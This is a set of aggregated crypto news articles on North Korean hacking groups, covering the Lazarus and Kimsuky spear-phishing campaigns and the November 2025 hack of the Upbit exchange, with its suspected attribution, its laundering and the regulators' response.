According to a report from South Korean security firm AhnLab, state-linked hacking organizations like the North Korea-backed Lazarus Group relied heavily on spear phishing to steal funds and gather intelligence over the last 12 months. The group often posed as conference organizers, job contacts or colleagues to trick people into opening files or running commands.

Lazarus Group: Spear Phishing Turns More Realistic With AI Lures

Reports have disclosed that one unit known as Kimsuky used artificial intelligence to forge military ID images and lodge them inside a ZIP file to make messages look legitimate.

Security researchers say the fake IDs were convincing enough that recipients opened the attachments, which then ran hidden code. The incident has been traced to mid-July 2025 and appears to mark a step up in how attackers craft their lures.

The aim is simple. Get a user to trust a message, open a file, and the attacker gets a way in. That access can lead to stolen credentials, seeded malware or drained crypto wallets. The groups linked to Pyongyang have been tied to attacks on finance and defense targets, among others.

Lazarus Group Victims Asked To Execute Commands

Some campaigns did not rely only on hidden exploits. In several cases, targets were tricked into typing PowerShell commands themselves, sometimes while believing they were following official instructions.

That step lets attackers run scripts with high privileges without needing a zero-day. Security outlets have warned that this social trick is spreading and can be hard to spot.

Lazarus Group: Old File Types, New Tricks

Attackers also abused Windows shortcut files and similar formats to hide commands that run silently when a file is opened. Researchers have documented nearly 1,000 malicious .lnk samples tied to broader campaigns, showing that familiar file types remain a favorite delivery method. Those shortcuts can execute hidden arguments and pull down further payloads.

Why This Matters Now

This makes the attacks harder to stop: tailored messages, AI-forged visuals, and tricks that ask users to run code. Multi-factor authentication and software patches help, but training people to treat unusual requests with suspicion remains key. Security teams advocate basic safety nets: update, verify, and when in doubt, check with a known contact.

According to reports, Lazarus Group and Kimsuky continue to be active. Lazarus, based on AhnLab’s findings, received the most mentions in post-cybercrime analyses over the last 12 months. The group has been singled out for financially motivated hacks, while Kimsuky seems more focused on intelligence gathering and tailored deception.

Featured image from Anadolu, chart from TradingView

South Korea’s largest cryptocurrency exchange, Upbit, is currently under scrutiny by regulators following a significant hack that led to the unauthorized withdrawal of approximately $36.9 million in assets on the Solana (SOL) network. The breach impacted over 20 different tokens and has prompted Upbit to freeze assets on its platform while an investigation unfolds.

Lazarus Group Tied To Upbit Hack

Authorities are now investigating the possibility of North Korean involvement in the cyber attack. Reports suggest that a group affiliated with North Korea’s intelligence agency, the notorious Lazarus Group, may have orchestrated the hack, which Upbit has described as an “abnormal withdrawal.” 

This group has been consistently linked to several high-profile crypto heists in recent years, and the US Federal Bureau of Investigation (FBI) has identified North Korean cyber operations as one of the most sophisticated and persistent threats.

The recent attack coincidentally occurred just days before the sixth anniversary of a previous major breach, in which Upbit lost 342,000 Ethereum (ETH) to North Korean hackers. 

According to an unnamed government official, this latest hack bears similarities to a 2019 incident in which approximately 58 billion won in cryptocurrencies was stolen, also attributed to the Lazarus Group.

In response to the attack, the South Korean National Police Agency has launched an investigation into the matter, although officials have not provided further comments on the case. Upbit’s operator, Dunamu, confirmed that an in-depth investigation into the cause and extent of the asset outflow is currently underway.

Crypto Exchange Moves Funds To Cold Storage

The cryptocurrency exchange’s CEO Oh Kyung-seok stated that as soon as abnormal withdrawal activity was detected, Upbit promptly suspended all deposit and withdrawal services. 

“We are conducting a comprehensive inspection, prioritizing the protection of member assets,” he said in a notice to users. Following the discovery of the unauthorized transactions, Upbit has taken steps to freeze the affected funds wherever possible.

To prevent any further unauthorized transfers, the exchange has shifted all remaining assets to cold storage, ensuring “a secure environment for funds.” 

Upbit is also said to be working with relevant project teams to freeze assets on-chain, having already blocked a portion of the stolen funds related to the cryptocurrency Solayer (LAYER). The exchange has indicated that deposits and withdrawals will only resume once full security checks are completed.

Dunamu has vowed to reimburse customers for any losses with business funds as part of its commitment to its users. It remains to be seen what additional information the country’s authorities will release in the coming days, as well as potential refund deadlines for affected individuals.  

Featured image from DALL-E, chart from TradingView.com 

Upbit, South Korea’s biggest cryptocurrency exchange, said it found unusual withdrawals from one of its Solana hot wallets and moved quickly to stop trades and protect customers.

According to company statements and law enforcement sources, about 44.5 billion Korean won — roughly $32 million — vanished in the incident that surfaced late November 2025. Upbit paused deposits and withdrawals and said it would repay affected users from its own reserves.

Suspected North Korean Ties

Based on reports from investigators and industry watchers, authorities are examining links to the Lazarus Group, a cyber unit long tied to North Korea.

Security teams point to methods similar to earlier attacks attributed to the same group, including a major breach in 2019 that took 342,000 ETH from the exchange.

Officials say the pattern of rapid withdrawals, quick cross-chain transfers, and spreading funds across many wallets matches tactics used in past nation-linked operations.

today south korea blamed north korea for the upbit hack nice headline but that part came later

so what actually happened?

an unknown attacker drained a few of upbit’s hot wallets waited a bit then started moving funds across chains

at some point the hacker bridged usdc from… pic.twitter.com/swq8yjIOLR

— trix (@trixwtb) November 28, 2025

How The Funds Were Moved

Reports have disclosed that the stolen tokens were moved off Solana, converted through several bridges, and routed through multiple chains to make tracking harder.

Transfers happened fast and in many small transactions, which complicates tracing attempts on the blockchain. Blockchain analysts are combing transaction histories, but the bridge conversions and mixing steps slow down any straightforward recovery efforts.

On-Site Checks And Ongoing Forensics

Authorities have launched inspections at Upbit’s systems and are reviewing logs, admin access records, and wallet backups.

According to sources close to the probe, investigators suspect an admin credential compromise or impersonation rather than a simple software flaw in Upbit’s servers.

While evidence is still being gathered, forensic teams are looking for the entry point used to sign the withdrawal transactions and any indicators of outside control.

Investigation And Market Impact

The timing of the theft drew attention because it coincided with corporate news: Upbit’s parent, Dunamu, had public talk of a merger with Naver valued at about $10.3 billion.

Market players noted the coincidence, and some suggested the attack could aim to distract or unsettle stakeholders. For investors, exchanges, and regulators, the incident renews calls for stricter custody controls, better separation of hot and cold wallets, and clearer rules for large crypto platforms.

Yonhap News reports that South Korea’s largest crypto exchange, Upbit, suffered a hack worth about 44.5 billion KRW ($32 million). Authorities are investigating whether North Korea’s Lazarus Group was behind the attack. The group was also linked to Upbit’s 2019 theft of 58…

— Wu Blockchain (@WuBlockchain) November 28, 2025

Upbit has pledged full reimbursement to users hit by the theft and says it will share findings when the probe allows. Based on reports, tracing and recovery work is ongoing but will be slow because of how the assets were fragmented and moved across chains.

Watchers say confirmation of Lazarus involvement would mark another example of how state-linked actors continue to target major crypto firms.

Authorities have not yet publicly released a definitive attribution. The next steps to watch include any formal statements from prosecutors, whether any of the moved funds are frozen or returned, and how regulators will respond to reduce the chance of similar losses.

Featured image from Advance Innovations, chart from TradingView

South Korea’s largest cryptocurrency exchange, Upbit, is facing a second major security crisis after 44.5 billion won (around $30–32 million) in digital assets were drained from a hot wallet, with authorities “strongly” suspecting North Korea’s Lazarus Group.

According to ICT industry sources and government officials cited by Yonhap News on November 28, investigators are focusing on Lazarus, a hacking unit under North Korea’s Reconnaissance General Bureau, as the likely perpetrator. The group was also suspected in Upbit’s 2019 breach, when approximately 58 billion won in Ethereum was stolen.

North Korean Crypto Hackers Strike Again

The latest incident again centers on a hot wallet — an internet-connected operational wallet — replicating the core vulnerability of 2019. A government official quoted by Yonhap said the attack likely did not involve a deep server exploit but instead an administrative compromise: “Rather than a server attack, it’s possible they compromised an administrator account or impersonated an administrator to transfer funds,” adding that because the earlier hack used this method, “we consider this approach the most likely.”

Security experts point to the post-hack on-chain behavior as key circumstantial evidence. After the theft, the funds were rapidly “hopped” through other exchange wallets and then subjected to “mixing,” a laundering technique designed to break traceability.

One expert noted that “funds were hopped to other exchange wallets before mixing occurred. This can be seen as the modus operandi of the Lazarus Group,” adding that “once mixing occurs, transactions become untraceable.” Because FATF member countries cannot legally operate mixing services, the expert argued it is “highly likely North Korea was responsible.”

The timing has raised additional suspicion. The hack occurred on November 27, the same day Naver and Upbit operator Dunamu held a high-profile joint press conference at Naver’s “1784” headquarters to present their group-integration and AI/Web3 expansion strategy.

A security expert suggested the date may have been intentionally chosen: “Hackers often have a strong desire to show off. It’s possible they chose the 27th as the hacking date to flaunt their timing, selecting the very day of the merger announcement.” The attack also lands almost exactly six years after Upbit’s 2019 hack, which occurred on November 27.

Regulatory and supervisory bodies have moved quickly. Following a December interpretation by the Financial Services Commission that virtual asset exchanges’ user transaction data falls under the Credit Information Act, the Financial Supervisory Service and the Korea Financial Security Institute have launched an on-site inspection of Upbit. The Korea Internet & Security Agency has joined to provide technical support.

At press time, the total crypto market cap stood at $3.07 trillion.

South Korean authorities suspect that the November Upbit hack may have been masterminded by the notorious Lazarus Group. Unnamed industry sources told local media that the North Korean state-backed hackers may have been behind the breach, as the recent attack…

North Korea’s notorious cybercrime unit, Lazarus Group, is suspected of orchestrating a major cryptocurrency breach that drained roughly $30.6 million from South Korea’s largest exchange, Upbit.

Authorities are preparing to conduct an on-site inspection at the exchange, following signs that the attack may be tied to the same actors behind previous intrusions attributed to Lazarus, Yonhap News reported, citing government and industry sources.

The group has previously been linked to crypto thefts aimed at generating revenue for Pyongyang amid persistent foreign currency shortages.

Dunamu to Reimburse Users After $30M Solana-Linked Hack at Upbit

Upbit’s operator, Dunamu, confirmed that Solana-linked assets worth 44.5 billion won were transferred to an unauthorized wallet on Thursday.

The company said it will reimburse users in full using its own reserves and moved quickly to halt withdrawals and deposits as internal checks were launched.

Investigators said the techniques used in the breach closely resembled the 2019 incident in which attackers allegedly stole 58 billion won in Ethereum from the same platform.

Officials believe this time the hackers may have bypassed core infrastructure by impersonating administrators or compromising internal accounts to authorize the withdrawal.

Security officials said the funds were swiftly moved through wallets associated with other platforms, indicating an attempt to obscure transaction trails through laundering tactics that Lazarus has used in past operations.

“It is their standard approach to scatter tokens across multiple networks to break tracking,” one official said.

today south korea blamed north korea for the upbit hack
nice headline
but that part came later

so what actually happened?

an unknown attacker drained a few of upbit’s hot wallets
waited a bit
then started moving funds across chains

at some point the hacker bridged usdc from… pic.twitter.com/swq8yjIOLR

— trix (@trixwtb) November 28, 2025

Analysts noted that Lazarus has repeatedly targeted high-profile crypto platforms to maximize impact and exposure, suggesting the attack may have been deliberately staged to exploit heightened public attention.

Earlier this month, South Korea said it may reconsider its sanctions approach toward North Korea after new US measures connected Pyongyang’s crypto theft operations to the funding of its weapons programs.

Second Vice Foreign Minister Kim Ji-na said Seoul could “review sanctions as a measure if they are really needed,” stressing close coordination with Washington to counter North Korea’s growing cyber and digital threats.

“In cases of cryptocurrency theft by Pyongyang, coordination between South Korea and the US is important, as it can be used to fund North Korea’s nuclear and missile programs and pose a threat to our digital ecosystem,” Kim stated.

Naver Announces Plan to Acquire Dunamu

The breach came a day after Naver announced a plan to acquire Dunamu via a share-swap deal through its finance arm, putting the exchange in the national spotlight.

Meanwhile, Naver Financial, the fintech arm of South Korean internet giant Naver, is preparing to roll out a stablecoin wallet in Busan as part of the city’s ongoing push to build a blockchain-powered local economy.

Naver has reportedly finished development of the wallet, which is now undergoing final checks before its scheduled launch next month.

The project is being built in partnership with venture capital firm Hashed and the Busan Digital Asset Exchange (BDAN), the entity behind Busan’s broader digital asset strategy.

The post North Korea’s Lazarus Group Linked to $30M Hack at South Korean Exchange Upbit appeared first on Cryptonews.

Researchers say Russia’s Gamaredon and North Korea’s Lazarus may be sharing infrastructure — a rare APT collaboration.

The post Rare APT Collaboration Emerges Between Russia and North Korea appeared first on TechRepublic.

Researchers say Russia’s Gamaredon and North Korea’s Lazarus may be sharing infrastructure — a rare APT collaboration.

The post Rare APT Collaboration Emerges Between Russia and North Korea appeared first on TechRepublic.